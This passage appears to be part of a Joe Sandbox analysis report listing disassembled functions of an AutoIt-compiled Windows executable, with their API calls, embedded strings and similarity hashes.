                                                                                                                      • API ID: ErrorMode$DriveType
                                                                                                                      • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                                                      • API String ID: 2907320926-4222207086
                                                                                                                      APIs
                                                                                                                      • DestroyWindow.USER32 ref: 003A4956
                                                                                                                      • DeleteObject.GDI32(00000000), ref: 003A4998
                                                                                                                      • DeleteObject.GDI32(00000000), ref: 003A49A3
                                                                                                                      • DestroyCursor.USER32(00000000), ref: 003A49AE
                                                                                                                      • DestroyWindow.USER32(00000000), ref: 003A49B9
                                                                                                                      • SendMessageW.USER32(?,00001308,?,00000000), ref: 0041E179
                                                                                                                      • 6FB80200.COMCTL32(?,000000FF,?), ref: 0041E1B2
                                                                                                                      • MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 0041E5E0
                                                                                                                        • Part of subcall function 003A49CA: InvalidateRect.USER32(?,00000000,00000001,?,?,?,003A4954,00000000), ref: 003A4A23
                                                                                                                      • SendMessageW.USER32 ref: 0041E627
                                                                                                                      • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0041E63E
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: DestroyMessageSendWindow$DeleteObject$B80200CursorInvalidateMoveRect
                                                                                                                      • String ID: 0$@U=u
                                                                                                                      • API String ID: 295266683-975001249
                                                                                                                      APIs
                                                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013,?,?,?), ref: 0040C598
                                                                                                                      • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040C64E
                                                                                                                      • SendMessageW.USER32(?,00001102,00000002,?), ref: 0040C669
                                                                                                                      • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0040C925
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$Window
                                                                                                                      • String ID: 0$@U=u
                                                                                                                      • API String ID: 2326795674-975001249
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __wcsnicmp
                                                                                                                      • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                                                      • API String ID: 1038674560-86951937
                                                                                                                      APIs
                                                                                                                      • CharUpperBuffW.USER32(?,?,0043DBF0), ref: 00406245
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: BuffCharUpper
                                                                                                                      • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                                                                      • API String ID: 3964851224-45149045
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 0040B5C0
                                                                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0040B5D1
                                                                                                                      • CharNextW.USER32(0000014E), ref: 0040B600
                                                                                                                      • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 0040B641
                                                                                                                      • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 0040B657
                                                                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0040B668
                                                                                                                      • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 0040B685
                                                                                                                      • SetWindowTextW.USER32(?,0000014E), ref: 0040B6D7
                                                                                                                      • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 0040B6ED
                                                                                                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 0040B71E
                                                                                                                      • _memset.LIBCMT ref: 0040B743
                                                                                                                      • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 0040B78C
                                                                                                                      • _memset.LIBCMT ref: 0040B7EB
                                                                                                                      • SendMessageW.USER32 ref: 0040B815
                                                                                                                      • SendMessageW.USER32(?,00001074,?,00000001), ref: 0040B86D
                                                                                                                      • SendMessageW.USER32(?,0000133D,?,?), ref: 0040B91A
                                                                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 0040B93C
                                                                                                                      • GetMenuItemInfoW.USER32(?), ref: 0040B986
                                                                                                                      • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0040B9B3
                                                                                                                      • DrawMenuBar.USER32(?), ref: 0040B9C2
                                                                                                                      • SetWindowTextW.USER32(?,0000014E), ref: 0040B9EA
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                                                                      • String ID: 0$@U=u
                                                                                                                      • API String ID: 1073566785-975001249
                                                                                                                      • Opcode ID: 71bd76cd2a513ed49a9926dfaf493410c9e646f1d225d6e38490be6cd9203da5
                                                                                                                      • Instruction ID: b2af1cdda7dbf139caeeed107b2d1df88115a2ce8044ec2a44fcde05ce840da6
                                                                                                                      • Opcode Fuzzy Hash: 71bd76cd2a513ed49a9926dfaf493410c9e646f1d225d6e38490be6cd9203da5
                                                                                                                      • Instruction Fuzzy Hash: D7E17071A00218ABDB219F55CC84EEE7BB8FF05714F10816AF915BB2D0D7788A41DFA9
                                                                                                                      APIs
                                                                                                                      • GetCursorPos.USER32(?), ref: 00407587
                                                                                                                      • GetDesktopWindow.USER32 ref: 0040759C
                                                                                                                      • GetWindowRect.USER32(00000000), ref: 004075A3
                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00407605
                                                                                                                      • DestroyWindow.USER32(?), ref: 00407631
                                                                                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 0040765A
                                                                                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00407678
                                                                                                                      • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 0040769E
                                                                                                                      • SendMessageW.USER32(?,00000421,?,?), ref: 004076B3
                                                                                                                      • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 004076C6
                                                                                                                      • IsWindowVisible.USER32(?), ref: 004076E6
                                                                                                                      • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00407701
                                                                                                                      • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00407715
                                                                                                                      • GetWindowRect.USER32(?,?), ref: 0040772D
                                                                                                                      • MonitorFromPoint.USER32(?,?,00000002), ref: 00407753
                                                                                                                      • GetMonitorInfoW.USER32 ref: 0040776D
                                                                                                                      • CopyRect.USER32(?,?), ref: 00407784
                                                                                                                      • SendMessageW.USER32(?,00000412,00000000), ref: 004077EF
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                                                      • String ID: ($0$tooltips_class32
                                                                                                                      • API String ID: 698492251-4156429822
                                                                                                                      • Opcode ID: be14a1de9dcd79c7079b3d5e1d4e2552463a65daf6b23b2305afe91637cdbe8a
                                                                                                                      • Instruction ID: 93482742a0ab16d59ffc4e209a0169ffadcefc5f7f03564a79180654f0ff26e1
                                                                                                                      • Opcode Fuzzy Hash: be14a1de9dcd79c7079b3d5e1d4e2552463a65daf6b23b2305afe91637cdbe8a
                                                                                                                      • Instruction Fuzzy Hash: C2B18F71A08300AFDB14DF64C944B6ABBE5FF89310F00892EF599AB291DB75EC05CB56
                                                                                                                      APIs
                                                                                                                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 003BA839
                                                                                                                      • GetSystemMetrics.USER32(00000007), ref: 003BA841
                                                                                                                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 003BA86C
                                                                                                                      • GetSystemMetrics.USER32(00000008), ref: 003BA874
                                                                                                                      • GetSystemMetrics.USER32(00000004), ref: 003BA899
                                                                                                                      • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 003BA8B6
                                                                                                                      • AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 003BA8C6
                                                                                                                      • CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 003BA8F9
                                                                                                                      • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 003BA90D
                                                                                                                      • GetClientRect.USER32(00000000,000000FF), ref: 003BA92B
                                                                                                                      • GetStockObject.GDI32(00000011), ref: 003BA947
                                                                                                                      • SendMessageW.USER32(00000000,00000030,00000000), ref: 003BA952
                                                                                                                        • Part of subcall function 003BB736: GetCursorPos.USER32(000000FF), ref: 003BB749
                                                                                                                        • Part of subcall function 003BB736: ScreenToClient.USER32(00000000,000000FF), ref: 003BB766
                                                                                                                        • Part of subcall function 003BB736: GetAsyncKeyState.USER32(00000001), ref: 003BB78B
                                                                                                                        • Part of subcall function 003BB736: GetAsyncKeyState.USER32(00000002), ref: 003BB799
                                                                                                                      • SetTimer.USER32(00000000,00000000,00000028,003BACEE), ref: 003BA979
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                                      • String ID: @U=u$AutoIt v3 GUI
                                                                                                                      • API String ID: 1458621304-2077007950
                                                                                                                      • Opcode ID: 20af90497393a097632782d9c1fe4172eaf36834d1395c808c516d464ca90020
                                                                                                                      • Instruction ID: 27a1b7851b18c1016b4f386ba2ea67d9656a8a447f3cdc8a1d11d4a7030eb136
                                                                                                                      • Opcode Fuzzy Hash: 20af90497393a097632782d9c1fe4172eaf36834d1395c808c516d464ca90020
                                                                                                                      • Instruction Fuzzy Hash: 11B18D35A0060AAFDB15EFA8CC45BEE7BB4FB08314F11422AFA05E72A0DB74D841CB55
                                                                                                                      APIs
                                                                                                                      • LoadIconW.USER32(00000063), ref: 003DF8AB
                                                                                                                      • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 003DF8BD
                                                                                                                      • SetWindowTextW.USER32(?,?), ref: 003DF8D4
                                                                                                                      • GetDlgItem.USER32(?,000003EA), ref: 003DF8E9
                                                                                                                      • SetWindowTextW.USER32(00000000,?), ref: 003DF8EF
                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 003DF8FF
                                                                                                                      • SetWindowTextW.USER32(00000000,?), ref: 003DF905
                                                                                                                      • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 003DF926
                                                                                                                      • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 003DF940
                                                                                                                      • GetWindowRect.USER32(?,?), ref: 003DF949
                                                                                                                      • SetWindowTextW.USER32(?,?), ref: 003DF9B4
                                                                                                                      • GetDesktopWindow.USER32 ref: 003DF9BA
                                                                                                                      • GetWindowRect.USER32(00000000), ref: 003DF9C1
                                                                                                                      • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 003DFA0D
                                                                                                                      • GetClientRect.USER32(?,?), ref: 003DFA1A
                                                                                                                      • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 003DFA3F
                                                                                                                      • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 003DFA6A
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                                                                      • String ID: @U=u
                                                                                                                      • API String ID: 3869813825-2594219639
                                                                                                                      • Opcode ID: c84677b5d8aa37c8832c92965044b6be1cf7897eb5ce9542a580b4c76a10f5c9
                                                                                                                      • Instruction ID: a18a96f945d5f869d40c7be98c397a3a6690373aaca5c624230ad36ff27c5581
                                                                                                                      • Opcode Fuzzy Hash: c84677b5d8aa37c8832c92965044b6be1cf7897eb5ce9542a580b4c76a10f5c9
                                                                                                                      • Instruction Fuzzy Hash: B5517B71E00709AFDB219FA8DD89F6EBBF5FF04704F004929E686A26A0C774A945CF04
                                                                                                                      APIs
                                                                                                                      • CharUpperBuffW.USER32(?,?), ref: 00406A52
                                                                                                                      • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00406B12
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: BuffCharMessageSendUpper
                                                                                                                      • String ID: @U=u$DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                                                      • API String ID: 3974292440-1753161424
                                                                                                                      • Opcode ID: 3133871b6c441ce3f4fd9c9c5ab6c999caf9cb8dcb2dfc787042d4dfa74b9825
                                                                                                                      • Instruction ID: b4939b489a65a688422b1c7029129c7b3c5072c7177f87ba16c15eb2649e696f
                                                                                                                      • Opcode Fuzzy Hash: 3133871b6c441ce3f4fd9c9c5ab6c999caf9cb8dcb2dfc787042d4dfa74b9825
                                                                                                                      • Instruction Fuzzy Hash: E7A1A6702142019FCB05EF24C851A6AB7A5FF85318F15993EB896AF3D2DB34EC16CB46
                                                                                                                      APIs
                                                                                                                      • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 0040E564
                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 0040E57B
                                                                                                                      • GlobalAlloc.KERNEL32(00000002,00000000), ref: 0040E586
                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0040E593
                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 0040E59C
                                                                                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0040E5AB
                                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 0040E5B4
                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0040E5BB
                                                                                                                      • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0040E5CC
                                                                                                                      • OleLoadPicture.OLEAUT32(?,00000000,00000000,0042D9BC,?), ref: 0040E5E5
                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 0040E5F5
                                                                                                                      • GetObjectW.GDI32(?,00000018,000000FF), ref: 0040E619
                                                                                                                      • CopyImage.USER32(?,00000000,?,?,00002000), ref: 0040E644
                                                                                                                      • DeleteObject.GDI32(00000000), ref: 0040E66C
                                                                                                                      • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0040E682
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                      • String ID: @U=u
                                                                                                                      APIs
                                                                                                                      • GetClassNameW.USER32(00000008,?,00000400), ref: 003DE6E1
                                                                                                                      • _wcscmp.LIBCMT ref: 003DE6F2
                                                                                                                      • GetWindowTextW.USER32(00000001,?,00000400), ref: 003DE71A
                                                                                                                      • CharUpperBuffW.USER32(?,00000000), ref: 003DE737
                                                                                                                      • _wcscmp.LIBCMT ref: 003DE755
                                                                                                                      • _wcsstr.LIBCMT ref: 003DE766
                                                                                                                      • GetClassNameW.USER32(00000018,?,00000400), ref: 003DE79E
                                                                                                                      • _wcscmp.LIBCMT ref: 003DE7AE
                                                                                                                      • GetWindowTextW.USER32(00000002,?,00000400), ref: 003DE7D5
                                                                                                                      • GetClassNameW.USER32(00000018,?,00000400), ref: 003DE81E
                                                                                                                      • _wcscmp.LIBCMT ref: 003DE82E
                                                                                                                      • GetClassNameW.USER32(00000010,?,00000400), ref: 003DE856
                                                                                                                      • GetWindowRect.USER32(00000004,?), ref: 003DE8BF
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                                                                      • String ID: @$ThumbnailClass
                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 0040CD0B
                                                                                                                      • DestroyWindow.USER32(00000000,?), ref: 0040CD83
                                                                                                                        • Part of subcall function 003A7E53: _memmove.LIBCMT ref: 003A7EB9
                                                                                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0040CE04
                                                                                                                      • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0040CE26
                                                                                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0040CE35
                                                                                                                      • DestroyWindow.USER32(?), ref: 0040CE52
                                                                                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,003A0000,00000000), ref: 0040CE85
                                                                                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0040CEA4
                                                                                                                      • GetDesktopWindow.USER32 ref: 0040CEB9
                                                                                                                      • GetWindowRect.USER32(00000000), ref: 0040CEC0
                                                                                                                      • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0040CED2
                                                                                                                      • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0040CEEA
                                                                                                                        • Part of subcall function 003BB155: GetWindowLongW.USER32(?,000000EB), ref: 003BB166
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                                                                                      • String ID: 0$@U=u$tooltips_class32
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID: __wcsnicmp
                                                                                                                      • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                                                                      APIs
                                                                                                                      • CharUpperBuffW.USER32(?,?), ref: 00406FF9
                                                                                                                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00407044
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID: BuffCharMessageSendUpper
                                                                                                                      • String ID: @U=u$CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                                                      APIs
                                                                                                                      • _wcscpy.LIBCMT ref: 003F026A
                                                                                                                      • _wcschr.LIBCMT ref: 003F0278
                                                                                                                      • _wcscpy.LIBCMT ref: 003F028F
                                                                                                                      • _wcscat.LIBCMT ref: 003F029E
                                                                                                                      • _wcscat.LIBCMT ref: 003F02BC
                                                                                                                      • _wcscpy.LIBCMT ref: 003F02DD
                                                                                                                      • __wsplitpath.LIBCMT ref: 003F03BA
                                                                                                                      • _wcscpy.LIBCMT ref: 003F03DF
                                                                                                                      • _wcscpy.LIBCMT ref: 003F03F1
                                                                                                                      • _wcscpy.LIBCMT ref: 003F0406
                                                                                                                      • _wcscat.LIBCMT ref: 003F041B
                                                                                                                      • _wcscat.LIBCMT ref: 003F042D
                                                                                                                      • _wcscat.LIBCMT ref: 003F0442
                                                                                                                        • Part of subcall function 003EC890: _wcscmp.LIBCMT ref: 003EC92A
                                                                                                                        • Part of subcall function 003EC890: __wsplitpath.LIBCMT ref: 003EC96F
                                                                                                                        • Part of subcall function 003EC890: _wcscpy.LIBCMT ref: 003EC982
                                                                                                                        • Part of subcall function 003EC890: _wcscat.LIBCMT ref: 003EC995
                                                                                                                        • Part of subcall function 003EC890: __wsplitpath.LIBCMT ref: 003EC9BA
                                                                                                                        • Part of subcall function 003EC890: _wcscat.LIBCMT ref: 003EC9D0
                                                                                                                        • Part of subcall function 003EC890: _wcscat.LIBCMT ref: 003EC9E3
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
                                                                                                                      • String ID: >>>AUTOIT SCRIPT<<<
                                                                                                                      APIs
                                                                                                                      • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0040E3BB
                                                                                                                      • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,00409615,?), ref: 0040E417
                                                                                                                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0040E457
                                                                                                                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0040E49C
                                                                                                                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0040E4D3
                                                                                                                      • FreeLibrary.KERNEL32(?,00000004,?,?,?,00409615,?), ref: 0040E4DF
                                                                                                                      • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0040E4EF
                                                                                                                      • DestroyCursor.USER32(?), ref: 0040E4FE
                                                                                                                      • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0040E51B
                                                                                                                      • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0040E527
                                                                                                                        • Part of subcall function 003C1BC7: __wcsicmp_l.LIBCMT ref: 003C1C50
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Load$Image$LibraryMessageSend$CursorDestroyExtractFreeIcon__wcsicmp_l
                                                                                                                      • String ID: .dll$.exe$.icl$@U=u
                                                                                                                      • API String ID: 3907162815-1639919054
                                                                                                                      • Opcode ID: fe57c903147e29d96215565176d6719fb07702cd460a097dd723957a95f999d3
                                                                                                                      • Instruction ID: 5151a086b3a8b03fac05a1cf4a6d464465fa81acad0696e379f3624a83fec7a8
